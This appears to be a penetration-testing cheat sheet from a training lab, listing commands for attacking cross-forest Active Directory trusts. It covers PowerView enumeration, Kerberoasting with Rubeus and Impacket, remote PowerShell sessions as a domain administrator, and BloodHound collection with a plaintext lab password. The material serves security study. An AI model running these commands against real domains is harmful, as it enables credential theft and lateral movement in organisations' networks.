Trust Relationships - Cross-Forest
Trust Relationships - Cross-Forest
1. Enumerate Accounts with Service Principal Names (SPNs)
Command:
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountNameDescription: PowerView tool used to enumerate accounts with associated SPNs.
2. Enumerate MSSQL Service Account
Command:
Get-DomainUser -Domain FREIGHTLOGISTICS.LOCAL -Identity mssqlsvc | select samaccountname,memberofDescription: PowerView tool used to enumerate the
mssqlsvcaccount.
3. Perform Kerberoasting Attack with Rubeus
Command:
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrapDescription: Uses Rubeus to perform a Kerberoasting attack against a target Windows domain.
4. Enumerate Foreign Group Members
Command:
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCALDescription: PowerView tool used to enumerate groups containing users from outside the domain.
5. Establish Remote PowerShell Session
Command:
Enter-PSSession -ComputerName ACADEMY-EADC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administratorDescription: PowerShell cmdlet used to connect remotely to a target Windows system.
6. Request TGS Ticket for Kerberoasting
Command:
GetUserSPNs.py -request -targetdomain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wleyDescription: Impacket tool used to request a TGS ticket for an account in the target Windows domain.
7. Run BloodHound Enumeration
Command:
bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EADC01 -c All -u forend -p Klmcargo2Description: Runs the Python implementation of BloodHound to map Active Directory relationships.
8. Compress Files for BloodHound GUI Upload
Command:
zip -r ilfreight_bh.zip *.jsonDescription: Compresses multiple JSON files into a single
.zipfile for upload into the BloodHound GUI.
Last updated